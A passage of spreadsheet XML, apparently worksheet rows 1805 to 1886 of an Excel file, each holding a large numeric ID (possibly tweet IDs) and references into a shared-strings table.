        <v>1.2352902379722299E+18</v>
      </c>
      <c r="B1805" t="s">
        <v>4689</v>
      </c>
      <c r="C1805" t="s">
        <v>1</v>
      </c>
      <c r="D1805" t="s">
        <v>4690</v>
      </c>
      <c r="E1805" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="1806" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1806">
        <v>1.2352901334123599E+18</v>
      </c>
      <c r="B1806" t="s">
        <v>4691</v>
      </c>
      <c r="C1806" t="s">
        <v>1</v>
      </c>
      <c r="D1806" t="s">
        <v>4692</v>
      </c>
      <c r="E1806" t="s">
        <v>4693</v>
      </c>
    </row>
    <row r="1807" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1807">
        <v>1.23529004302515E+18</v>
      </c>
      <c r="B1807" t="s">
        <v>4694</v>
      </c>
      <c r="C1807" t="s">
        <v>1</v>
      </c>
      <c r="D1807" t="s">
        <v>4695</v>
      </c>
      <c r="E1807" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="1808" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1808">
        <v>1.2352896463572401E+18</v>
      </c>
      <c r="B1808" t="s">
        <v>4696</v>
      </c>
      <c r="C1808" t="s">
        <v>1</v>
      </c>
      <c r="D1808" t="s">
        <v>4697</v>
      </c>
      <c r="E1808" t="s">
        <v>4698</v>
      </c>
    </row>
    <row r="1809" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1809">
        <v>1.2352894711485299E+18</v>
      </c>
      <c r="B1809" t="s">
        <v>4699</v>
      </c>
      <c r="C1809" t="s">
        <v>1</v>
      </c>
      <c r="D1809" t="s">
        <v>4700</v>
      </c>
      <c r="E1809" t="s">
        <v>1262</v>
      </c>
    </row>
    <row r="1810" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1810">
        <v>1.23528899030093E+18</v>
      </c>
      <c r="B1810" t="s">
        <v>4701</v>
      </c>
      <c r="C1810" t="s">
        <v>1</v>
      </c>
      <c r="D1810" t="s">
        <v>4702</v>
      </c>
      <c r="E1810" t="s">
        <v>4703</v>
      </c>
    </row>
    <row r="1811" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1811">
        <v>1.2352889554798899E+18</v>
      </c>
      <c r="B1811" t="s">
        <v>4704</v>
      </c>
      <c r="C1811" t="s">
        <v>1</v>
      </c>
      <c r="D1811" t="s">
        <v>4705</v>
      </c>
      <c r="E1811" t="s">
        <v>4706</v>
      </c>
    </row>
    <row r="1812" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1812">
        <v>1.2352884240195699E+18</v>
      </c>
      <c r="B1812" t="s">
        <v>4707</v>
      </c>
      <c r="C1812" t="s">
        <v>1</v>
      </c>
      <c r="D1812" t="s">
        <v>4708</v>
      </c>
      <c r="E1812" t="s">
        <v>2192</v>
      </c>
    </row>
    <row r="1813" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1813">
        <v>1.23528821337328E+18</v>
      </c>
      <c r="B1813" t="s">
        <v>4709</v>
      </c>
      <c r="C1813" t="s">
        <v>1</v>
      </c>
      <c r="D1813" t="s">
        <v>4710</v>
      </c>
      <c r="E1813" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="1814" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1814">
        <v>1.23528766930909E+18</v>
      </c>
      <c r="B1814" t="s">
        <v>4711</v>
      </c>
      <c r="C1814" t="s">
        <v>1</v>
      </c>
      <c r="D1814" t="s">
        <v>4712</v>
      </c>
      <c r="E1814" t="s">
        <v>2192</v>
      </c>
    </row>
    <row r="1815" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1815">
        <v>1.23528760761507E+18</v>
      </c>
      <c r="B1815" t="s">
        <v>4713</v>
      </c>
      <c r="C1815" t="s">
        <v>1</v>
      </c>
      <c r="D1815" t="s">
        <v>4714</v>
      </c>
      <c r="E1815" t="s">
        <v>4715</v>
      </c>
    </row>
    <row r="1816" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1816">
        <v>1.2352874426154099E+18</v>
      </c>
      <c r="B1816" t="s">
        <v>4716</v>
      </c>
      <c r="C1816" t="s">
        <v>1</v>
      </c>
      <c r="D1816" t="s">
        <v>4717</v>
      </c>
      <c r="E1816" t="s">
        <v>1701</v>
      </c>
    </row>
    <row r="1817" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1817">
        <v>1.2352871432175301E+18</v>
      </c>
      <c r="B1817" t="s">
        <v>4718</v>
      </c>
      <c r="C1817" t="s">
        <v>1</v>
      </c>
      <c r="D1817" t="s">
        <v>4719</v>
      </c>
      <c r="E1817" t="s">
        <v>4720</v>
      </c>
    </row>
    <row r="1818" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1818">
        <v>1.2352870125104E+18</v>
      </c>
      <c r="B1818" t="s">
        <v>4721</v>
      </c>
      <c r="C1818" t="s">
        <v>1</v>
      </c>
      <c r="D1818" t="s">
        <v>4722</v>
      </c>
      <c r="E1818" t="s">
        <v>2192</v>
      </c>
    </row>
    <row r="1819" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1819">
        <v>1.2352869233772401E+18</v>
      </c>
      <c r="B1819" t="s">
        <v>4723</v>
      </c>
      <c r="C1819" t="s">
        <v>1</v>
      </c>
      <c r="D1819" t="s">
        <v>4724</v>
      </c>
      <c r="E1819" t="s">
        <v>4725</v>
      </c>
    </row>
    <row r="1820" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1820">
        <v>1.2352868565787899E+18</v>
      </c>
      <c r="B1820" t="s">
        <v>4726</v>
      </c>
      <c r="C1820" t="s">
        <v>1</v>
      </c>
      <c r="D1820" t="s">
        <v>4727</v>
      </c>
      <c r="E1820" t="s">
        <v>4728</v>
      </c>
    </row>
    <row r="1821" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1821">
        <v>1.23528664805059E+18</v>
      </c>
      <c r="B1821" t="s">
        <v>4729</v>
      </c>
      <c r="C1821" t="s">
        <v>1</v>
      </c>
      <c r="D1821" t="s">
        <v>4730</v>
      </c>
      <c r="E1821" t="s">
        <v>4731</v>
      </c>
    </row>
    <row r="1822" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1822">
        <v>1.2352865356055601E+18</v>
      </c>
      <c r="B1822" t="s">
        <v>4732</v>
      </c>
      <c r="C1822" t="s">
        <v>1</v>
      </c>
      <c r="D1822" t="s">
        <v>4733</v>
      </c>
      <c r="E1822" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="1823" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1823">
        <v>1.23528644106594E+18</v>
      </c>
      <c r="B1823" t="s">
        <v>4734</v>
      </c>
      <c r="C1823" t="s">
        <v>1</v>
      </c>
      <c r="D1823" t="s">
        <v>4735</v>
      </c>
      <c r="E1823" t="s">
        <v>1804</v>
      </c>
    </row>
    <row r="1824" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1824">
        <v>1.2352863897903601E+18</v>
      </c>
      <c r="B1824" t="s">
        <v>4736</v>
      </c>
      <c r="C1824" t="s">
        <v>1</v>
      </c>
      <c r="D1824" t="s">
        <v>4737</v>
      </c>
      <c r="E1824" t="s">
        <v>4738</v>
      </c>
    </row>
    <row r="1825" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1825">
        <v>1.2352859326492001E+18</v>
      </c>
      <c r="B1825" t="s">
        <v>4739</v>
      </c>
      <c r="C1825" t="s">
        <v>1</v>
      </c>
      <c r="D1825" t="s">
        <v>4740</v>
      </c>
      <c r="E1825" t="s">
        <v>4741</v>
      </c>
    </row>
    <row r="1826" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1826">
        <v>1.23528568304189E+18</v>
      </c>
      <c r="B1826" t="s">
        <v>4742</v>
      </c>
      <c r="C1826" t="s">
        <v>1</v>
      </c>
      <c r="D1826" t="s">
        <v>4743</v>
      </c>
      <c r="E1826" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="1827" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1827">
        <v>1.23528523222559E+18</v>
      </c>
      <c r="B1827" t="s">
        <v>4744</v>
      </c>
      <c r="C1827" t="s">
        <v>1</v>
      </c>
      <c r="D1827" t="s">
        <v>4745</v>
      </c>
      <c r="E1827" t="s">
        <v>2895</v>
      </c>
    </row>
    <row r="1828" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1828">
        <v>1.23528458181907E+18</v>
      </c>
      <c r="B1828" t="s">
        <v>4746</v>
      </c>
      <c r="C1828" t="s">
        <v>1</v>
      </c>
      <c r="D1828" t="s">
        <v>4747</v>
      </c>
      <c r="E1828" t="s">
        <v>4748</v>
      </c>
    </row>
    <row r="1829" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1829">
        <v>1.23528450405665E+18</v>
      </c>
      <c r="B1829" t="s">
        <v>4749</v>
      </c>
      <c r="C1829" t="s">
        <v>1</v>
      </c>
      <c r="D1829" t="s">
        <v>4750</v>
      </c>
      <c r="E1829" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="1830" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1830">
        <v>1.2352841455527099E+18</v>
      </c>
      <c r="B1830" t="s">
        <v>4751</v>
      </c>
      <c r="C1830" t="s">
        <v>1</v>
      </c>
      <c r="D1830" t="s">
        <v>4752</v>
      </c>
      <c r="E1830" t="s">
        <v>4753</v>
      </c>
    </row>
    <row r="1831" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1831">
        <v>1.2352841328648499E+18</v>
      </c>
      <c r="B1831" t="s">
        <v>4754</v>
      </c>
      <c r="C1831" t="s">
        <v>1</v>
      </c>
      <c r="D1831" t="s">
        <v>4755</v>
      </c>
      <c r="E1831" t="s">
        <v>4756</v>
      </c>
    </row>
    <row r="1832" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1832">
        <v>1.23528270875184E+18</v>
      </c>
      <c r="B1832" t="s">
        <v>4757</v>
      </c>
      <c r="C1832" t="s">
        <v>1</v>
      </c>
      <c r="D1832" t="s">
        <v>4758</v>
      </c>
      <c r="E1832" t="s">
        <v>4759</v>
      </c>
    </row>
    <row r="1833" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1833">
        <v>1.23528262502945E+18</v>
      </c>
      <c r="B1833" t="s">
        <v>4760</v>
      </c>
      <c r="C1833" t="s">
        <v>1</v>
      </c>
      <c r="D1833" t="s">
        <v>4761</v>
      </c>
      <c r="E1833" t="s">
        <v>4762</v>
      </c>
    </row>
    <row r="1834" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1834">
        <v>1.2352821759453E+18</v>
      </c>
      <c r="B1834" t="s">
        <v>4763</v>
      </c>
      <c r="C1834" t="s">
        <v>1</v>
      </c>
      <c r="D1834" t="s">
        <v>4764</v>
      </c>
      <c r="E1834" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="1835" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1835">
        <v>1.2352815067776599E+18</v>
      </c>
      <c r="B1835" t="s">
        <v>4765</v>
      </c>
      <c r="C1835" t="s">
        <v>1</v>
      </c>
      <c r="D1835" t="s">
        <v>4766</v>
      </c>
      <c r="E1835" t="s">
        <v>4767</v>
      </c>
    </row>
    <row r="1836" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1836">
        <v>1.23528133811632E+18</v>
      </c>
      <c r="B1836" t="s">
        <v>4768</v>
      </c>
      <c r="C1836" t="s">
        <v>1</v>
      </c>
      <c r="D1836" t="s">
        <v>4769</v>
      </c>
      <c r="E1836" t="s">
        <v>4770</v>
      </c>
    </row>
    <row r="1837" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1837">
        <v>1.2352813205966899E+18</v>
      </c>
      <c r="B1837" t="s">
        <v>4771</v>
      </c>
      <c r="C1837" t="s">
        <v>1</v>
      </c>
      <c r="D1837" t="s">
        <v>4772</v>
      </c>
      <c r="E1837" t="s">
        <v>4773</v>
      </c>
    </row>
    <row r="1838" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1838">
        <v>1.23528123086785E+18</v>
      </c>
      <c r="B1838" t="s">
        <v>4774</v>
      </c>
      <c r="C1838" t="s">
        <v>1</v>
      </c>
      <c r="D1838" t="s">
        <v>4775</v>
      </c>
      <c r="E1838" t="s">
        <v>1762</v>
      </c>
    </row>
    <row r="1839" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1839">
        <v>1.23528115701459E+18</v>
      </c>
      <c r="B1839" t="s">
        <v>4776</v>
      </c>
      <c r="C1839" t="s">
        <v>1</v>
      </c>
      <c r="D1839" t="s">
        <v>4777</v>
      </c>
      <c r="E1839" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="1840" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1840">
        <v>1.2352811006348201E+18</v>
      </c>
      <c r="B1840" t="s">
        <v>4778</v>
      </c>
      <c r="C1840" t="s">
        <v>1</v>
      </c>
      <c r="D1840" t="s">
        <v>4779</v>
      </c>
      <c r="E1840" t="s">
        <v>4780</v>
      </c>
    </row>
    <row r="1841" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1841">
        <v>1.2352810635403899E+18</v>
      </c>
      <c r="B1841" t="s">
        <v>4781</v>
      </c>
      <c r="C1841" t="s">
        <v>1</v>
      </c>
      <c r="D1841" t="s">
        <v>4782</v>
      </c>
      <c r="E1841" t="s">
        <v>3931</v>
      </c>
    </row>
    <row r="1842" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1842">
        <v>1.2352810626930401E+18</v>
      </c>
      <c r="B1842" t="s">
        <v>4781</v>
      </c>
      <c r="C1842" t="s">
        <v>1</v>
      </c>
      <c r="D1842" t="s">
        <v>4783</v>
      </c>
      <c r="E1842" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="1843" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1843">
        <v>1.23528084828865E+18</v>
      </c>
      <c r="B1843" t="s">
        <v>4784</v>
      </c>
      <c r="C1843" t="s">
        <v>1</v>
      </c>
      <c r="D1843" t="s">
        <v>4785</v>
      </c>
      <c r="E1843" t="s">
        <v>4786</v>
      </c>
    </row>
    <row r="1844" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1844">
        <v>1.2352805682014899E+18</v>
      </c>
      <c r="B1844" t="s">
        <v>4787</v>
      </c>
      <c r="C1844" t="s">
        <v>1</v>
      </c>
      <c r="D1844" t="s">
        <v>4788</v>
      </c>
      <c r="E1844" t="s">
        <v>4789</v>
      </c>
    </row>
    <row r="1845" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1845">
        <v>1.23528046054622E+18</v>
      </c>
      <c r="B1845" t="s">
        <v>4790</v>
      </c>
      <c r="C1845" t="s">
        <v>1</v>
      </c>
      <c r="D1845" t="s">
        <v>4791</v>
      </c>
      <c r="E1845" t="s">
        <v>4792</v>
      </c>
    </row>
    <row r="1846" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1846">
        <v>1.2352803525429399E+18</v>
      </c>
      <c r="B1846" t="s">
        <v>4793</v>
      </c>
      <c r="C1846" t="s">
        <v>1</v>
      </c>
      <c r="D1846" t="s">
        <v>4794</v>
      </c>
      <c r="E1846" t="s">
        <v>4795</v>
      </c>
    </row>
    <row r="1847" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1847">
        <v>1.23528015896318E+18</v>
      </c>
      <c r="B1847" t="s">
        <v>4796</v>
      </c>
      <c r="C1847" t="s">
        <v>1</v>
      </c>
      <c r="D1847" t="s">
        <v>4797</v>
      </c>
      <c r="E1847" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="1848" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1848">
        <v>1.2352800781429801E+18</v>
      </c>
      <c r="B1848" t="s">
        <v>4798</v>
      </c>
      <c r="C1848" t="s">
        <v>1</v>
      </c>
      <c r="D1848" t="s">
        <v>4799</v>
      </c>
      <c r="E1848" t="s">
        <v>4800</v>
      </c>
    </row>
    <row r="1849" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1849">
        <v>1.23527985782481E+18</v>
      </c>
      <c r="B1849" t="s">
        <v>4801</v>
      </c>
      <c r="C1849" t="s">
        <v>1</v>
      </c>
      <c r="D1849" t="s">
        <v>4802</v>
      </c>
      <c r="E1849" t="s">
        <v>4803</v>
      </c>
    </row>
    <row r="1850" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1850">
        <v>1.23527983935729E+18</v>
      </c>
      <c r="B1850" t="s">
        <v>4804</v>
      </c>
      <c r="C1850" t="s">
        <v>1</v>
      </c>
      <c r="D1850" t="s">
        <v>4805</v>
      </c>
      <c r="E1850" t="s">
        <v>4806</v>
      </c>
    </row>
    <row r="1851" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1851">
        <v>1.2352794268432699E+18</v>
      </c>
      <c r="B1851" t="s">
        <v>4807</v>
      </c>
      <c r="C1851" t="s">
        <v>1</v>
      </c>
      <c r="D1851" t="s">
        <v>4808</v>
      </c>
      <c r="E1851" t="s">
        <v>4809</v>
      </c>
    </row>
    <row r="1852" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1852">
        <v>1.2352793534931899E+18</v>
      </c>
      <c r="B1852" t="s">
        <v>4810</v>
      </c>
      <c r="C1852" t="s">
        <v>1</v>
      </c>
      <c r="D1852" t="s">
        <v>4811</v>
      </c>
      <c r="E1852" t="s">
        <v>1334</v>
      </c>
    </row>
    <row r="1853" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1853">
        <v>1.2352791626229299E+18</v>
      </c>
      <c r="B1853" t="s">
        <v>4812</v>
      </c>
      <c r="C1853" t="s">
        <v>1</v>
      </c>
      <c r="D1853" t="s">
        <v>4813</v>
      </c>
      <c r="E1853" t="s">
        <v>4814</v>
      </c>
    </row>
    <row r="1854" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1854">
        <v>1.2352791410056599E+18</v>
      </c>
      <c r="B1854" t="s">
        <v>4815</v>
      </c>
      <c r="C1854" t="s">
        <v>1</v>
      </c>
      <c r="D1854" t="s">
        <v>4816</v>
      </c>
      <c r="E1854" t="s">
        <v>4817</v>
      </c>
    </row>
    <row r="1855" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1855">
        <v>1.2352791172824499E+18</v>
      </c>
      <c r="B1855" t="s">
        <v>4818</v>
      </c>
      <c r="C1855" t="s">
        <v>1</v>
      </c>
      <c r="D1855" t="s">
        <v>4819</v>
      </c>
      <c r="E1855" t="s">
        <v>4820</v>
      </c>
    </row>
    <row r="1856" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1856">
        <v>1.23527910652846E+18</v>
      </c>
      <c r="B1856" t="s">
        <v>4821</v>
      </c>
      <c r="C1856" t="s">
        <v>1</v>
      </c>
      <c r="D1856" t="s">
        <v>4822</v>
      </c>
      <c r="E1856" t="s">
        <v>4823</v>
      </c>
    </row>
    <row r="1857" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1857">
        <v>1.2352789572028001E+18</v>
      </c>
      <c r="B1857" t="s">
        <v>4824</v>
      </c>
      <c r="C1857" t="s">
        <v>1</v>
      </c>
      <c r="D1857" t="s">
        <v>4825</v>
      </c>
      <c r="E1857" t="s">
        <v>4826</v>
      </c>
    </row>
    <row r="1858" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1858">
        <v>1.2352788923251599E+18</v>
      </c>
      <c r="B1858" t="s">
        <v>4827</v>
      </c>
      <c r="C1858" t="s">
        <v>1</v>
      </c>
      <c r="D1858" t="s">
        <v>4828</v>
      </c>
      <c r="E1858" t="s">
        <v>4829</v>
      </c>
    </row>
    <row r="1859" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1859">
        <v>1.23527884041648E+18</v>
      </c>
      <c r="B1859" t="s">
        <v>4830</v>
      </c>
      <c r="C1859" t="s">
        <v>1</v>
      </c>
      <c r="D1859" t="s">
        <v>4831</v>
      </c>
      <c r="E1859" t="s">
        <v>1346</v>
      </c>
    </row>
    <row r="1860" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1860">
        <v>1.2352787731945001E+18</v>
      </c>
      <c r="B1860" t="s">
        <v>4832</v>
      </c>
      <c r="C1860" t="s">
        <v>1</v>
      </c>
      <c r="D1860" t="s">
        <v>4833</v>
      </c>
      <c r="E1860" t="s">
        <v>4382</v>
      </c>
    </row>
    <row r="1861" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1861">
        <v>1.2352778972309399E+18</v>
      </c>
      <c r="B1861" t="s">
        <v>4834</v>
      </c>
      <c r="C1861" t="s">
        <v>1</v>
      </c>
      <c r="D1861" t="s">
        <v>4835</v>
      </c>
      <c r="E1861" t="s">
        <v>4836</v>
      </c>
    </row>
    <row r="1862" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1862">
        <v>1.2352772307935601E+18</v>
      </c>
      <c r="B1862" t="s">
        <v>4837</v>
      </c>
      <c r="C1862" t="s">
        <v>1</v>
      </c>
      <c r="D1862" t="s">
        <v>4838</v>
      </c>
      <c r="E1862" t="s">
        <v>4839</v>
      </c>
    </row>
    <row r="1863" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1863">
        <v>1.2352770048466299E+18</v>
      </c>
      <c r="B1863" t="s">
        <v>4840</v>
      </c>
      <c r="C1863" t="s">
        <v>1</v>
      </c>
      <c r="D1863" t="s">
        <v>4841</v>
      </c>
      <c r="E1863" t="s">
        <v>3939</v>
      </c>
    </row>
    <row r="1864" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1864">
        <v>1.2352763567762701E+18</v>
      </c>
      <c r="B1864" t="s">
        <v>4842</v>
      </c>
      <c r="C1864" t="s">
        <v>1</v>
      </c>
      <c r="D1864" t="s">
        <v>4843</v>
      </c>
      <c r="E1864" t="s">
        <v>4844</v>
      </c>
    </row>
    <row r="1865" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1865">
        <v>1.23527633140077E+18</v>
      </c>
      <c r="B1865" t="s">
        <v>4845</v>
      </c>
      <c r="C1865" t="s">
        <v>1</v>
      </c>
      <c r="D1865" t="s">
        <v>4846</v>
      </c>
      <c r="E1865" t="s">
        <v>4847</v>
      </c>
    </row>
    <row r="1866" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1866">
        <v>1.23527615597824E+18</v>
      </c>
      <c r="B1866" t="s">
        <v>4848</v>
      </c>
      <c r="C1866" t="s">
        <v>1</v>
      </c>
      <c r="D1866" t="s">
        <v>4849</v>
      </c>
      <c r="E1866" t="s">
        <v>4850</v>
      </c>
    </row>
    <row r="1867" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1867">
        <v>1.23527558312431E+18</v>
      </c>
      <c r="B1867" t="s">
        <v>4851</v>
      </c>
      <c r="C1867" t="s">
        <v>1</v>
      </c>
      <c r="D1867" t="s">
        <v>4852</v>
      </c>
      <c r="E1867" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="1868" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1868">
        <v>1.2352753716727501E+18</v>
      </c>
      <c r="B1868" t="s">
        <v>4853</v>
      </c>
      <c r="C1868" t="s">
        <v>1</v>
      </c>
      <c r="D1868" t="s">
        <v>4854</v>
      </c>
      <c r="E1868" t="s">
        <v>4855</v>
      </c>
    </row>
    <row r="1869" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1869">
        <v>1.2352753377827599E+18</v>
      </c>
      <c r="B1869" t="s">
        <v>4856</v>
      </c>
      <c r="C1869" t="s">
        <v>1</v>
      </c>
      <c r="D1869" t="s">
        <v>4857</v>
      </c>
      <c r="E1869" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="1870" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1870">
        <v>1.2352751537953999E+18</v>
      </c>
      <c r="B1870" t="s">
        <v>4858</v>
      </c>
      <c r="C1870" t="s">
        <v>1</v>
      </c>
      <c r="D1870" t="s">
        <v>4859</v>
      </c>
      <c r="E1870" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="1871" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1871">
        <v>1.23527511239746E+18</v>
      </c>
      <c r="B1871" t="s">
        <v>4860</v>
      </c>
      <c r="C1871" t="s">
        <v>1</v>
      </c>
      <c r="D1871" t="s">
        <v>4861</v>
      </c>
      <c r="E1871" t="s">
        <v>1804</v>
      </c>
    </row>
    <row r="1872" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1872">
        <v>1.23527484086253E+18</v>
      </c>
      <c r="B1872" t="s">
        <v>4862</v>
      </c>
      <c r="C1872" t="s">
        <v>1</v>
      </c>
      <c r="D1872" t="s">
        <v>4863</v>
      </c>
      <c r="E1872" t="s">
        <v>4864</v>
      </c>
    </row>
    <row r="1873" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1873">
        <v>1.2352748203985201E+18</v>
      </c>
      <c r="B1873" t="s">
        <v>4865</v>
      </c>
      <c r="C1873" t="s">
        <v>1</v>
      </c>
      <c r="D1873" t="s">
        <v>4866</v>
      </c>
      <c r="E1873" t="s">
        <v>4867</v>
      </c>
    </row>
    <row r="1874" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1874">
        <v>1.2352744299046799E+18</v>
      </c>
      <c r="B1874" t="s">
        <v>4868</v>
      </c>
      <c r="C1874" t="s">
        <v>1</v>
      </c>
      <c r="D1874" t="s">
        <v>4869</v>
      </c>
      <c r="E1874" t="s">
        <v>4870</v>
      </c>
    </row>
    <row r="1875" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1875">
        <v>1.23527441094622E+18</v>
      </c>
      <c r="B1875" t="s">
        <v>4871</v>
      </c>
      <c r="C1875" t="s">
        <v>1</v>
      </c>
      <c r="D1875" t="s">
        <v>4872</v>
      </c>
      <c r="E1875" t="s">
        <v>4873</v>
      </c>
    </row>
    <row r="1876" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1876">
        <v>1.2352743861706199E+18</v>
      </c>
      <c r="B1876" t="s">
        <v>4874</v>
      </c>
      <c r="C1876" t="s">
        <v>1</v>
      </c>
      <c r="D1876" t="s">
        <v>4875</v>
      </c>
      <c r="E1876" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1877" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1877">
        <v>1.2352743861538299E+18</v>
      </c>
      <c r="B1877" t="s">
        <v>4874</v>
      </c>
      <c r="C1877" t="s">
        <v>1</v>
      </c>
      <c r="D1877" t="s">
        <v>4876</v>
      </c>
      <c r="E1877" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1878" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1878">
        <v>1.23527438608258E+18</v>
      </c>
      <c r="B1878" t="s">
        <v>4874</v>
      </c>
      <c r="C1878" t="s">
        <v>1</v>
      </c>
      <c r="D1878" t="s">
        <v>4877</v>
      </c>
      <c r="E1878" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1879" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1879">
        <v>1.2352743860783401E+18</v>
      </c>
      <c r="B1879" t="s">
        <v>4874</v>
      </c>
      <c r="C1879" t="s">
        <v>1</v>
      </c>
      <c r="D1879" t="s">
        <v>4878</v>
      </c>
      <c r="E1879" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1880" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1880">
        <v>1.2352743860322601E+18</v>
      </c>
      <c r="B1880" t="s">
        <v>4874</v>
      </c>
      <c r="C1880" t="s">
        <v>1</v>
      </c>
      <c r="D1880" t="s">
        <v>4879</v>
      </c>
      <c r="E1880" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1881" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1881">
        <v>1.2352743859903301E+18</v>
      </c>
      <c r="B1881" t="s">
        <v>4874</v>
      </c>
      <c r="C1881" t="s">
        <v>1</v>
      </c>
      <c r="D1881" t="s">
        <v>4880</v>
      </c>
      <c r="E1881" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1882" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1882">
        <v>1.23527438596929E+18</v>
      </c>
      <c r="B1882" t="s">
        <v>4874</v>
      </c>
      <c r="C1882" t="s">
        <v>1</v>
      </c>
      <c r="D1882" t="s">
        <v>4881</v>
      </c>
      <c r="E1882" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1883" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1883">
        <v>1.2352743859650501E+18</v>
      </c>
      <c r="B1883" t="s">
        <v>4874</v>
      </c>
      <c r="C1883" t="s">
        <v>1</v>
      </c>
      <c r="D1883" t="s">
        <v>4882</v>
      </c>
      <c r="E1883" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1884" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1884">
        <v>1.2352743859567501E+18</v>
      </c>
      <c r="B1884" t="s">
        <v>4874</v>
      </c>
      <c r="C1884" t="s">
        <v>1</v>
      </c>
      <c r="D1884" t="s">
        <v>4883</v>
      </c>
      <c r="E1884" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="1885" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1885">
        <v>1.2352743843965E+18</v>
      </c>
      <c r="B1885" t="s">
        <v>4874</v>
      </c>
      <c r="C1885" t="s">
        <v>1</v>
      </c>
      <c r="D1885" t="s">
        <v>4884</v>
      </c>
      <c r="E1885" t="s">
        <v>4885</v>
      </c>
    </row>
    <row r="1886" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1886">
        <v>1.2352742792746501E+18</v>
      </c>
      <c r="B1886" t="s">
        <v>4886</v>
      </c>
